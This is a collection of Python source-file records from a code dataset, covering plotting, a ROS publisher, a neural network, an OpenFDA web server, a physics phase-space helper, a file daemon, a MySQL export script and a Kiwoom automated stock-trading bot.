* np.exp(-self.b * theta))\n\n return np.squeeze(C)\n\n def _features_for_sin(self):\n\n #getting the y asis base on the x asis, since the amplitude just asolates between 1 and -1\n c = self.converges_for_sin()\n\n #calculate the discrete difference along the y asis\n h= np.diff(c)\n h = np.hstack((h, [h[-1]]))\n phi = np.exp(-h * (self.s - c) ** 2)\n return self.s * phi / phi.sum()\n\n\n\ndef main():\n#########################################################################################\n #title of the sine curve\n plot.title('Demonstration')\n\n #give x axis a label, it is the time\n plot.xlabel('Time represented as t')\n\n #give y asix a label, it is the amplitude\n plot.ylabel('Amplitude - sin(time)')\n\n plot.grid(True, which='both')\n#########################################################################################\n\n w = [None]\n x_asis_of_turtle = [None]\n y_asis_for_turtle = [None]\n dmp = DMP(w,x_asis_of_turtle,y_asis_for_turtle,True)\n\n dmp.x_asis_of_turtle = x_coords\n dmp.y_asis_for_turtle = y_coords\n\n w = dmp.duplicate_for_sin()\n dmp.w = w\n array1, array2, array3 = dmp.reproduction_for_sin(dmp)\n\n array1_a = np.sin(array1)\n plot.plot(dmp.x_asis_of_turtle,array1)\n plot.axhline(y=0, color='green')\n\n array1_b = np.sin(array2)\n plot.plot((dmp.x_asis_of_turtle ),array1)\n plot.axhline(y=0, color='red')\n\n array1_c = np.sin(array3)\n plot.plot(dmp.x_asis_of_turtle,array3)\n plot.axhline(y=0, color='purple')\n plot.show()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cmaes_dmp_turtle.py","file_name":"cmaes_dmp_turtle.py","file_ext":"py","file_size_in_byte":9345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"295678594","text":"#!/usr/bin/python\nimport rospy\nfrom std_msgs.msg import Time\nfrom std_msgs.msg import Duration\n\n\nif __name__ == '__main__':\n\n rospy.init_node('monday_publisher_node')\n\n pub_time = rospy.Publisher('/some_time', Time, queue_size=10)\n pub_dur = rospy.Publisher('/duration_test', Duration, queue_size=10)\n\n rospy.loginfo(\"Initialization complete\")\n rospy.loginfo(\"Start publishing of messages\")\n\n msg_time = Time()\n msg_dur = Duration()\n count = 0\n\n r = rospy.Rate(2)\n while not rospy.is_shutdown():\n msg_time.data = rospy.Time(count, 200*count)\n msg_dur.data = rospy.Duration.from_sec(count)\n rospy.loginfo(\"Current time: %f sec\", msg_time.data.to_sec())\n rospy.loginfo(\"Current duration: %f\", msg_dur.data.to_sec())\n pub_time.publish(msg_time)\n pub_dur.publish(msg_dur)\n count += 1\n r.sleep()\n","sub_path":"all_materials/time_examples/simple_publisher.py","file_name":"simple_publisher.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"163905143","text":"'''\n simple 1 layer network\n'''\nfrom __future__ import division, print_function, absolute_import\n\nimport numpy\nimport tflearn\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\n\n\ndef train(bands_to_use,\n image_size,\n train_images,\n train_labels,\n test_images,\n test_labels,\n number_of_epochs,\n layer_type='one_layer_relu'):\n '''\n trains a single layer neural network\n returns predicted values for the test_images\n '''\n on_band_count = 0\n for b in bands_to_use:\n if b == 1:\n on_band_count += 1\n\n # normalize 0-255 values to 0-1\n train_images = train_images.astype(numpy.float32)\n train_images = numpy.multiply(train_images, 1.0 / 255.0)\n test_images = 
test_images.astype(numpy.float32)\n test_images = numpy.multiply(test_images, 1.0 / 255.0)\n\n network = tflearn.input_data(shape=[None, image_size, image_size, on_band_count])\n if layer_type == 'one_layer_relu':\n network = tflearn.fully_connected(network, 2048, activation='relu')\n elif layer_type == 'one_layer_relu_conv':\n network = conv_2d(network, 256, 16, activation='relu')\n network = max_pool_2d(network, 3)\n else:\n print(\"ERROR: exiting, unknown layer type for neural net\")\n\n # classify as road or not road\n softmax = tflearn.fully_connected(network, 2, activation='softmax')\n\n # based on parameters from https://www.cs.toronto.edu/~vmnih/docs/Mnih_Volodymyr_PhD_Thesis.pdf\n momentum = tflearn.optimizers.Momentum(\n learning_rate=.005, momentum=0.9,\n lr_decay=0.0002, name='Momentum')\n\n net = tflearn.regression(softmax, optimizer=momentum, loss='categorical_crossentropy')\n\n model = tflearn.DNN(net, tensorboard_verbose=0)\n model.fit(train_images,\n train_labels,\n n_epoch=number_of_epochs,\n shuffle=False,\n validation_set=(test_images, test_labels),\n show_metric=True,\n run_id='mlp')\n\n # batch predictions on the test image set, to avoid a memory spike\n all_predictions = []\n for x in range(0, len(test_images) - 100, 100):\n for p in model.predict(test_images[x:x + 100]):\n all_predictions.append(p)\n\n for p in model.predict(test_images[len(all_predictions):]):\n all_predictions.append(p)\n assert len(all_predictions) == len(test_images)\n\n return all_predictions\n","sub_path":"src/single_layer_network.py","file_name":"single_layer_network.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"486593600","text":"import http.server\nimport socketserver\nimport http.client\nimport json\n\nIP = \"localhost\"\nPORT = 8000\nsocketserver.TCPServer.allow_reuse_address = True\n\nclass OpenFDAClient():\n def get_url(self,choice,first_param, limit):\n headers = {'User-Agent': 'http-client'}\n conn = http.client.HTTPSConnection(\"api.fda.gov\")\n\n if choice != '':\n url = \"/drug/label.json?search=\" + choice + ':' + first_param + '&limit=' + limit\n else:\n url = \"/drug/label.json?limit=\" + limit\n conn.request(\"GET\", url, None, headers)\n\n r1 = conn.getresponse()\n drugs_raw = r1.read().decode(\"utf-8\")\n conn.close()\n search = json.loads(drugs_raw)\n\n return search\n\nclass OpenFDAParser():\n def parser(self, choice, search):\n\n list = []\n for i in range(len(search['results'])):\n if choice == 'active_ingredient'or choice == 'warnings':\n try:\n list.append(search['results'][i][choice][0])\n except KeyError:\n list.append(\"Unknown\")\n elif choice == 'manufacturer_name':\n try:\n list.append(search['results'][i]['openfda'][choice][0])\n except KeyError:\n list.append(\"Unknown\")\n\n return list\nclass OpenFDAHTML():\n def write_data(self, list):\n intro = \"\" + \"\" + \"\" + \"
    \"\n end = \"
\" + \"\" + \"\"\n\n with open(\"empty.html\", 'w') as f:\n f.write(intro)\n for element in list:\n f.write(\"
  • \" + element + \"
  • \")\n f.write(end)\n\n with open('empty.html', 'r') as f:\n file = f.read()\n return file\n\nclass testHTTPRequestHandler(http.server.BaseHTTPRequestHandler):\n def do_GET(self):\n client = OpenFDAClient()\n parser = OpenFDAParser()\n HTML = OpenFDAHTML()\n try:\n if self.path == \"/\":\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n with open(\"search.html\", \"r\") as f:\n menu = f.read()\n self.wfile.write(bytes(menu, \"utf8\"))\n\n elif 'search' in self.path or 'list' in self.path:\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n if 'searchDrug' in self.path:\n choice = \"active_ingredient\"\n elif 'searchCompany' in self.path:\n choice = \"manufacturer_name\"\n else:\n choice = ''\n\n input = self.path.split(\"=\")\n first_param = self.path.split(\"=\")[1].split(\"&\")[0]\n if \"&\" in input[1]:\n if input[2] == '':\n limit = '10'\n else:\n limit = input[2]\n else:\n limit = '10'\n\n search = client.get_url(choice, first_param, limit)\n\n if choice == '':\n if 'Drugs' in self.path:\n choice = 'active_ingredient'\n elif 'Companies' in self.path:\n choice = 'manufacturer_name'\n elif 'Warnings' in self.path:\n choice = 'warnings'\n\n list = parser.parser(choice, search)\n\n file = HTML.write_data(list)\n\n self.wfile.write(bytes(file, \"utf8\"))\n\n elif \"secret\" in self.path:\n self.send_response(401)\n self.send_header('WWW-Authenticate', 'Basic Realm = \"OpenFDA Private Zone\"')\n self.end_headers()\n\n elif \"redirect\" in self.path:\n self.send_response(302)\n self.send_header('Location', 'http://localhost:8000/')\n self.end_headers()\n\n else:\n self.send_response(404)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n with open(\"error.html\", \"r\") as f:\n file = f.read()\n self.wfile.write(bytes(file, \"utf8\"))\n\n except KeyError as ex:\n self.send_response(404)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n with open(\"error.html\", \"r\") as f:\n file = f.read()\n self.wfile.write(bytes(file, \"utf8\"))\n\n return\n\nHandler = testHTTPRequestHandler\n\nhttpd = socketserver.TCPServer((IP, PORT), Handler)\nprint(\"serving at port\", PORT)\ntry:\n httpd.serve_forever()\nexcept KeyboardInterrupt:\n pass\nhttpd.server_close()\n","sub_path":"openfda-project/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"176452218","text":"#/usr/bin/env python\n#-*- Coding: UTF-8 -*-\n\n__author__ = \"Lianjin WU \"\n__copyright__ = \"Copyright (c) Lianjin WU\"\n__created__ = \"[2020-11-06 Fri 23:18]\"\n\nimport ROOT as root\nimport math\n\nclass xs_func():\n def __init__(self, nbin, lower, upper, mass0 = 0.13957, mass1 = 0.13957, mass2 = 3.7737):\n \"\"\" bin, lower, upper limits for PHSP factor, three particle masses \"\"\"\n self._gr = root.TGraph()\n for ibin in range(nbin):\n m0 = lower + ibin*(upper - lower)/float(nbin)\n self._gr.SetPoint(ibin, lower + ibin*(upper - lower)/float(nbin), self.__getPHSPFactor(m0, mass0, mass1, mass2))\n\n ### three body PHSP function for TF1\n def __integralPHSPFunc(self, x, par):\n xx = x[0]\n e2star = (xx-par[1]*par[1]+par[2]*par[2])/(2*math.sqrt(xx))\n e3star = (par[0]*par[0]-xx-par[3]*par[3])/(2*math.sqrt(xx))\n func1 = math.sqrt(e2star*e2star-par[2]*par[2])\n func2 = math.sqrt(e3star*e3star-par[3]*par[3])\n fmax = -(func1-func2)*(func1-func2)\n fmin = 
-(func1+func2)*(func1+func2)\n func = fmax-fmin\n return func\n\n ### three body PHSP factor calculation based on TF1\n ### m0 -> m1 + m2 + m3\n def __getPHSPFactor(self, m0, m1, m2, m3):\n xmin = (m1+m2)*(m1+m2)\n xmax = (m0-m3)*(m0-m3)\n tf1 = root.TF1(\"f1%s\"%(str(m0).replace(\".\", \"\")), self.__integralPHSPFunc, xmin, xmax, 4)\n tf1.SetParameters(m0, m1, m2, m3)\n return tf1.Integral(xmin, xmax)\n\n ### PHSP facor Graph\n def getPHSPFactorGraph(self):\n return self._gr\n\n ### PHSP factor\n def getPHSPFactor(self, energy):\n return self._gr.Eval(energy)\n\n ### defined BW (PHSP factors are considered) \n def getOneBreitWigner(self, xx, mass, width, eewidth, minMotherEnergy):\n \"\"\" minMotherEnergy = m1 + m2 + m3\"\"\"\n if mass < minMotherEnergy or xx < minMotherEnergy or width < 0.0 or eewidth < 0.0: \n return complex(0.0, 0.0)\n\n left = mass / xx\n right = math.sqrt(self._gr.Eval(xx) / self._gr.Eval(mass))\n numerator = math.sqrt(12.0*math.pi*width*eewidth)\n denominator = complex(xx*xx-mass*mass, mass*width)\n middle = numerator/denominator\n \n return left*middle*right\n\n def getPHSP(self, xx):\n return self._gr.Eval(xx)\n\n ### defined correlated N BW (PHSP factors are included)\n def getCorrelatedBreitWigners(self, xx, resonances, minMotherEnergy):\n \"\"\" minMotherEnergy = m1 + m2 + m3 \n resonance: [mass, width, eewidth, phi] \"\"\"\n bw = complex(0.0, 0.0)\n for resonance in resonances:\n mass, width, eewidth, phi = resonance\n bw = bw + self.getOneBreitWigner(xx, mass, width, eewidth, minMotherEnergy)*(complex(math.cos(phi), math.sin(phi)))\n return bw\n \n ### defined exp(i*phi) = cos(phi) + i*sin(phi)\n def getExpIPhi(self, phi):\n \"\"\" exp(i*phi) = cos(phi) + i*sin(phi) \"\"\"\n return complex(math.cos(phi), math.sin(phi))\n","sub_path":"python/sys_err/ISR/sample/tools/xs_func_three_body.py","file_name":"xs_func_three_body.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"255482097","text":"from aiohttp import web\nimport aiohttp\nimport asyncio\nimport aiofiles\nimport os\nimport yaml\n\nclass Daemon():\n def __init__(self, config):\n with open(config, 'r') as cfg:\n try:\n data = yaml.load(cfg)\n self.port = data['port']\n if data['directory']:\n self.path = data['directory'] + '/'\n self.path_read = self.path\n else:\n self.path = '.'\n self.path_read = ''\n self.node_list = data['node_list']\n self.save_flag = data['save']\n except yaml.YAMLError as exc:\n print(exc)\n self.run()\n\n def run(self):\n daemon = web.Application()\n daemon.add_routes([\n web.get('/{name}', self.handle_get),\n web.delete('/{name}', self.handle_delete),\n ])\n web.run_app(daemon, port=self.port)\n\n async def check(self, request):\n name = request.match_info.get('name')\n text = ''\n if name in os.listdir(self.path):\n async with aiofiles.open(self.path_read + name) as f:\n text = await f.read()\n return text, name\n\n async def handle_get(self, request):\n text, name = await self.check(request)\n if not text:\n async with aiohttp.ClientSession() as session:\n futures = []\n for node in self.node_list:\n futures.append(session.delete(f\"http://{node['host']}:{node['port']}/{name}\"))\n for future in asyncio.as_completed(futures):\n resp = await future\n text = await resp.text()\n if text:\n break\n if text:\n if self.save_flag:\n async with aiofiles.open(self.path_read + name, 'w') as f:\n await f.write(text)\n return web.Response(text=text)\n return web.Response(status=404)\n\n 
async def handle_delete(self, request):\n text, _ = await self.check(request)\n return web.Response(text=text)\n\n\nDaemon(\"config.yml\")\n","sub_path":"daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"636962735","text":"#coding=utf-8\nimport MySQLdb\n\nconn= MySQLdb.connect(\n host='localhost',\n port = 3306,\n\tuser='lin',\n\tpasswd='lin',\n\tdb ='testDB',\n)\ncur = conn.cursor()\ncur2 = conn.cursor()\n#获得表中有多少条数据\naa=cur.execute(\"select rno,rname,introduction,remark from recipe\")\n\n#打印表中的多少数据\nfp = open('aaa.csv','w')\ninfo = cur.fetchmany(aa)\nfor i in info:\n\tfp.write(i[0]+\",\"+i[1]+\",\"+i[2]+\",\"+i[3]+\",\")\n\tbb = cur2.execute(\"select Group_concat(label) from recipelabel where rno='\"+i[0]+\"'\")\n\tinfo2 = cur2.fetchmany(bb)\n\tif info2[0][0]:\n\t\tfp.write(info2[0][0]+\",\")\n\n\n\tbb = cur2.execute(\"select Group_concat(stepdetail) from recipestep where rno='\"+i[0]+\"'\")\n\tinfo2 = cur2.fetchmany(bb)\n\tif info2[0][0]:\n\t\tfp.write(info2[0][0]+\",\")\n\n\n\tbb = cur2.execute(\"select Group_concat(material) from recipematerial where rno='\"+i[0]+\"'\")\n\tinfo2 = cur2.fetchmany(bb)\n\tif info2[0][0]:\n\t\tfp.write(info2[0][0]+\"\\n\")\n\ncur.close()\nconn.commit()\nconn.close()\n","sub_path":"db_data/showData.py","file_name":"showData.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"451856399","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QAxContainer import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nimport datetime\nfrom config.errCode import *\nfrom slack.slack import *\n\n\nclass MyWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setGeometry(300, 300, 500, 300)\n self.setWindowTitle(\"변동성 돌파전략\")\n self.symbol_list = [\"233740\", \"251340\", \"122630\", \"252670\"]\n self.symbol_dict = {} # [name, range, target, hold, quantity, target_quantity]\n self.bought_list = set([])\n self.target_buy_count = len(self.symbol_list) if len(self.symbol_list) < 5 else 5\n self.buy_percent = 1 / self.target_buy_count\n\n for symbol in self.symbol_list:\n self.symbol_dict[symbol] = [\"\", 0, 0, False, 0, 0]\n\n self.amount = None\n self.account = None\n self.on_market = None # \"0\": 장 시작 전, \"3\": 장 중, \"2\": 장후 동시호가, \"4\": �� 마감\n self.on_trade = 0 # 0: 09:05 전, 1: 09:05~15:15, 2: 15:15 이후\n\n self.t_now = datetime.datetime.now()\n self.t_9 = self.t_now.replace(hour=9, minute=0, second=0, microsecond=0)\n self.t_start = self.t_now.replace(hour=9, minute=5, second=0, microsecond=0)\n self.t_sell = self.t_now.replace(hour=15, minute=15, second=0, microsecond=0)\n self.t_day = datetime.datetime.today().weekday()\n\n self.plain_text_edit = QPlainTextEdit(self)\n self.plain_text_edit.setReadOnly(True)\n self.plain_text_edit.move(10, 10)\n self.plain_text_edit.resize(480, 280)\n\n self.timer = QTimer(self)\n self.timer.start(10000)\n self.timer.setInterval(3000)\n self.timer.timeout.connect(self.timeout_run)\n\n self.timer_ten = QTimer(self)\n ten_minute = 1000 * 60 * 10 * 3\n self.timer_ten.start(10000)\n self.timer_ten.setInterval(ten_minute)\n self.timer_ten.timeout.connect(self.timeout_ten)\n\n self.ocx = QAxWidget(\"KHOPENAPI.KHOpenAPICtrl.1\")\n self.ocx.OnEventConnect.connect(self._handler_login)\n self.ocx.OnReceiveTrData.connect(self._handler_tr_data)\n 
self.ocx.OnReceiveRealData.connect(self._handler_real_data)\n self.ocx.OnReceiveChejanData.connect(self._handler_chejan_data)\n\n self.login_event_loop = QEventLoop()\n self.CommConnect() # 로그인이 될 때까지 대기\n self.run(self.symbol_list)\n\n def CommConnect(self):\n self.ocx.dynamicCall(\"CommConnect()\")\n self.login_event_loop.exec_()\n\n def run(self, symbol_list):\n accounts = self.GetLoginInfo(\"ACCNO\")\n self.account = accounts.split(\";\")[1]\n self.plain_text_edit.appendPlainText(f\"현재 계좌번호: {self.account}\")\n\n self.subscribe_market_time(\"1\")\n\n self.request_opw00004() # 계좌 평가 현황 조회\n self.request_opt10075() # 미체결 조회\n\n for i, symbol in enumerate(self.symbol_list):\n self.subscribe_stock_conclusion(str(i + 1), symbol)\n\n for symbol in symbol_list:\n self.request_opt10081(symbol) # 종목 별 전일 정보 조회\n self.request_opw00001() # 예수금 조회\n\n today = self.get_today()\n to_slack(today + \" 주가 조회 시작\")\n\n def get_today(self):\n today = self.t_now.strftime(\"%Y%m%d %H:%M\")\n return today\n\n def timeout_run(self):\n self.t_now = datetime.datetime.now()\n if self.t_day == (5 or 6):\n print(\"오늘은 \", \"토요일\" if self.t_day == 5 else \"일요일\", \"입니다.\")\n QCoreApplication.instance().quit()\n if self.t_9 < self.t_now < self.t_start:\n self.on_trade = 0\n if self.bought_list:\n self.sell_all(self.bought_list)\n self.plain_text_edit.appendPlainText(\"전일 보유량 시장가 매도 완료\")\n elif self.t_sell < self.t_now:\n self.on_trade = 2\n if self.bought_list:\n self.sell_all(self.bought_list)\n self.plain_text_edit.appendPlainText(\"금일 매수량 시장가 매도 완료\")\n elif self.t_start < self.t_now < self.t_sell:\n self.on_trade = 1\n\n def timeout_ten(self):\n if self.on_trade == 1:\n today = self.get_today()\n info = f\"{today} 주식 현재가 감시중\"\n self.plain_text_edit.appendPlainText(info)\n to_slack(info) # slack 감시중 확인\n\n def GetLoginInfo(self, tag):\n data = self.ocx.dynamicCall(\"GetLoginInfo(QString)\", tag)\n return data\n\n def _handler_login(self, err_code):\n if err_code == 0:\n self.plain_text_edit.appendPlainText(\"로그인 완료\")\n else:\n if err_code == -106: # 사용자가 강제로 키움api 프로그램을 종료하였을 경우\n print(\"에러 내용 :\", errors(err_code)[1])\n QCoreApplication.instance().quit()\n print(\"로그인에 실패하였습니다.\")\n print(\"에러 내용 :\", errors(err_code)[1])\n QCoreApplication.instance().quit()\n self.login_event_loop.exit()\n\n def _handler_tr_data(self, screen_no, rqname, trcode, record, next):\n if rqname == \"예수금조회\":\n 주문가능금액 = self.GetCommData(trcode, rqname, 0, \"주문가능금액\")\n 주문가능금액 = int(주문가능금액)\n if self.bought_list:\n self.target_buy_count = (\n len(self.symbol_list) if len(self.symbol_list) < 5 else 5\n ) - len(self.bought_list)\n self.buy_percent = 1 / self.target_buy_count\n self.amount = int(주문가능금액 * (self.buy_percent))\n self.plain_text_edit.appendPlainText(f\"주문가능금액: {주문가능금액} 1종목당 투자금액: {self.amount}\")\n\n elif rqname == \"계좌평가현황\":\n rows = self.GetRepeatCnt(trcode, rqname)\n for i in range(rows):\n 종목코드 = self.GetCommData(trcode, rqname, i, \"종목코드\")[1:]\n 보유수량 = self.GetCommData(trcode, rqname, i, \"보유수량\")\n self.bought_list.add(종목코드)\n self.sadddict[종목코드][3] = True\n self.symbol_dict[종목코드][4] = int(보유수량)\n\n elif rqname == \"실시간미체결요청\":\n rows = self.GetRepeatCnt(trcode, rqname)\n for i in range(rows):\n 종목코드 = self.GetCommData(trcode, rqname, i, \"종목코드\")\n 종목명 = self.GetCommData(trcode, rqname, i, \"종목명\")\n 주문수량 = self.GetCommData(trcode, rqname, i, \"주문수량\")\n 미체결수량 = self.GetCommData(trcode, rqname, i, \"미체결수량\")\n self.symbol_dict[종목코드][3] = True\n self.symbol_dict[종목코드][4] = int(주문수량 - 미체결수량)\n 
self.plain_text_edit.appendPlainText(f\"{종목명} {미체결수량}/{주문수량} 미체결\")\n\n elif rqname == \"매수\":\n pass\n\n elif rqname == \"매도\":\n pass\n\n else:\n t_now = datetime.datetime.now()\n today = t_now.strftime(\"%Y%m%d\")\n 일자 = self.GetCommData(trcode, rqname, 0, \"일자\")\n\n # 장시작 후 TR 요청하는 경우 0번째 row에 당일 일봉 데이터가 존재함\n if 일자 != today:\n 고가 = self.GetCommData(trcode, rqname, 0, \"고가\")\n 저가 = self.GetCommData(trcode, rqname, 0, \"저가\")\n else:\n 일자 = self.GetCommData(trcode, rqname, 1, \"일자\")\n 고가 = self.GetCommData(trcode, rqname, 1, \"고가\")\n 저가 = self.GetCommData(trcode, rqname, 1, \"저가\")\n\n prev_day_range = int(고가) - int(저가)\n self.symbol_dict[rqname][1] = prev_day_range\n info = (\n f\"{self.symbol_dict[rqname][0]} 일자: {일자} 고가: {고가} 저가: {저가} 전일변동: {prev_day_range}\"\n )\n self.plain_text_edit.appendPlainText(info)\n\n def GetRepeatCnt(self, trcode, rqname):\n ret = self.ocx.dynamicCall(\"GetRepeatCnt(QString, QString)\", trcode, rqname)\n return ret\n\n def GetMasterCodeName(self, code):\n name = self.ocx.dynamicCall(\"GetMasterCodeName(QString)\", code)\n return name\n\n def request_opt10081(self, target_code):\n now = datetime.datetime.now()\n today = now.strftime(\"%Y%m%d\")\n self.SetInputValue(\"종목코드\", target_code)\n self.SetInputValue(\"기준일자\", today)\n self.SetInputValue(\"수정주가구분\", 1)\n self.CommRqData(target_code, \"opt10081\", 0, \"9000\")\n\n def request_opw00001(self):\n self.SetInputValue(\"계좌번호\", self.account)\n self.SetInputValue(\"비밀번호\", \"\")\n self.SetInputValue(\"비밀번호입력매체구분\", \"00\")\n self.SetInputValue(\"조회구분\", 2)\n self.CommRqData(\"예수금조회\", \"opw00001\", 0, \"9001\")\n\n def request_opw00004(self):\n self.SetInputValue(\"계좌번호\", self.account)\n self.SetInputValue(\"비밀번호\", \"\")\n self.SetInputValue(\"상장폐지조회구분\", 0)\n self.SetInputValue(\"비밀번호입력매체구분\", \"00\")\n self.CommRqData(\"계좌평가현황\", \"opw00004\", 0, \"9002\")\n\n def request_opt10075(self):\n self.SetInputValue(\"계좌번호\", self.account)\n self.SetInputValue(\"전체종목구분\", \"0\")\n self.SetInputValue(\"매매구분\", \"2\")\n self.SetInputValue(\"체결구분\", \"1\")\n self.CommRqData(\"실시간미체결요청\", \"opt10075\", 0, \"9003\")\n\n # 실시간 타입을 위한 메소드\n def SetRealReg(self, screen_no, code_list, fid_list, real_type):\n self.ocx.dynamicCall(\n \"SetRealReg(QString, QString, QString, QString)\",\n screen_no,\n code_list,\n fid_list,\n real_type,\n )\n\n def GetCommRealData(self, code, fid):\n data = self.ocx.dynamicCall(\"GetCommRealData(QString, int)\", code, fid)\n return data\n\n def DisConnectRealData(self, screen_no):\n self.ocx.dynamicCall(\"DisConnectRealData(QString)\", screen_no)\n\n # 실시간 이벤트 처리 핸들러\n def _handler_real_data(self, code, real_type, real_data):\n if real_type == \"장시작시간\":\n 장운영구분 = self.GetCommRealData(code, 215)\n if 장운영구분 == (\"2\" or \"4\"):\n QCoreApplication.instance().quit()\n print(\"장 종료 - 프로그램 종료\")\n self.on_market = 장운영구분\n\n elif real_type == \"���식체결\":\n if self.on_trade == 1:\n if len(self.bought_list) >= self.target_buy_count:\n # add 목표 수량보다 많을 경우 pass\n pass\n else:\n # 현재가\n 현재가 = self.GetCommRealData(code, 10)\n 현재가 = abs(int(현재가)) # +100, -100\n 체결시간 = self.GetCommRealData(code, 20)\n\n # 목표가 계산\n # TR 요청을 통한 전일 range가 계산되었고 아직 당일 목표가가 계산되지 않았다면\n if self.symbol_dict[code][1] != 0 and self.symbol_dict[code][2] == 0:\n 시가 = self.GetCommRealData(code, 16)\n 시가 = abs(int(시가)) # +100, -100\n code_target = int(시가 + (self.symbol_dict[code][1] * 0.4))\n self.symbol_dict[code][2] = code_target\n self.plain_text_edit.appendPlainText(\n f\"{self.symbol_dict[code][0]} 목표가 계산됨: {code_target}\"\n 
)\n\n # 매수시도\n # 당일 매수하지 않았고\n # TR 요청과 Real을 통한 목표가가 설정되었고\n # TR 요청을 통해 잔고조회가 되었고\n # 현재가가 목표가가 이상이면\n if (\n self.symbol_dict[code][3] is False\n and self.symbol_dict[code][2]\n and self.amount is not None\n and 현재가 >= self.symbol_dict[code][2]\n ):\n self.symbol_dict[code][3] = True\n quantity = int(self.amount / 현재가)\n self.symbol_dict[code][5] = quantity\n self.SendOrder(\"매수\", \"8000\", self.account, 1, code, quantity, 0, \"03\", \"\")\n info = f\"{self.symbol_dict[code][0]} 시간: {체결시간} 목표가: {self.symbol_dict[code][2]} 현재가: {현재가} 시장가 매수 진행 수량: {quantity}\"\n self.plain_text_edit.appendPlainText(info)\n to_slack(info)\n\n def _handler_chejan_data(self, gubun, item_cnt, fid_list):\n if gubun == \"1\": # 잔고통보'\n 매수매도구분 = self.GetChejanData(\"946\")\n if 매수매도구분 == \"2\": # 매수 잔고 변동\n 종목코드 = self.GetChejanData(\"9001\")[1:]\n 종목명 = self.GetChejanData(\"302\").strip()\n 보유수량 = self.GetChejanData(\"930\")\n 매입단가 = self.GetChejanData(\"931\")\n self.symbol_dict[종목코드][4] = int(보유수량)\n self.bought_list.add(종목코드)\n self.plain_text_edit.appendPlainText(f\"{종목명} 매입단가: {매입단가} 보유수량: {보유수량}\")\n if self.symbol_dict[종목코드][4] == self.symbol_dict[종목코드][5]:\n to_slack(\n f\"{종목명} 목표가: {self.symbol_dict[종목코드][2]} 매입단가: {매입단가} 수량: {보유수량} 체결 완료\"\n )\n elif 매수매도구분 == \"1\": # 매도 잔고 변동\n pass\n\n def sell_all(self, bought_list):\n today = self.get_today()\n to_slack(today + \" 전량 매도 진행\")\n for symbol in bought_list:\n self.SendOrder(\n \"매도\",\n \"8001\",\n self.account,\n 2,\n symbol,\n self.symbol_dict[symbol][4],\n 0,\n \"03\",\n \"\",\n )\n self.symbol_dict[symbol][3] = False\n self.symbol_dict[symbol][4] = 0\n self.bought_list = set([])\n\n def subscribe_stock_conclusion(self, screen_no, symbol):\n self.SetRealReg(screen_no, symbol, \"20\", 1)\n name = self.GetMasterCodeName(symbol)\n self.symbol_dict[symbol][0] = name\n self.plain_text_edit.appendPlainText(f\"{name} 주식체결 구독신청\")\n\n def subscribe_market_time(self, screen_no):\n self.SetRealReg(screen_no, \"\", \"215\", 0)\n self.plain_text_edit.appendPlainText(\"장시작시간 구독신청\")\n\n # TR 요청을 위한 메소드\n def SetInputValue(self, id, value):\n self.ocx.dynamicCall(\"SetInputValue(QString, QString)\", id, value)\n\n def CommRqData(self, rqname, trcode, next, screen_no):\n self.ocx.dynamicCall(\n \"CommRqData(QString, QString, int, QString)\",\n rqname,\n trcode,\n next,\n screen_no,\n )\n\n def GetCommData(self, trcode, rqname, index, item):\n data = self.ocx.dynamicCall(\n \"GetCommData(QString, QString, int, QString)\", trcode, rqname, index, item\n )\n return data.strip()\n\n def SendOrder(self, rqname, screen, accno, order_type, code, quantity, price, hoga, order_no):\n self.ocx.dynamicCall(\n \"SendOrder(QString, QString, QString, int, QString, int, int, QString, QString)\",\n [rqname, screen, accno, order_type, code, quantity, price, hoga, order_no],\n )\n\n def GetChejanData(self, fid):\n data = self.ocx.dynamicCall(\"GetChejanData(int)\", fid)\n return data\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = MyWindow()\n window.show()\n app.exec_()\n","sub_path":"KiwoomAPI/kiwoom_ver1.2.py","file_name":"kiwoom_ver1.2.py","file_ext":"py","file_size_in_byte":16431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"139875671","text":"import random\n\n'''faker伪数据库支持方法'''\nTEMPLATES = {\n 'Id NO.': 'INT',\n 'First Name': 'VARCHAR(50)', # 名\n 'Last Name': 'VARCHAR(50)', # 姓\n 'Email Address': 'VARCHAR(150)', # 邮箱\n 'Gender': 'VARCHAR(50)', # 性别\n 'IP Address V4': 'VARCHAR(150)', # 
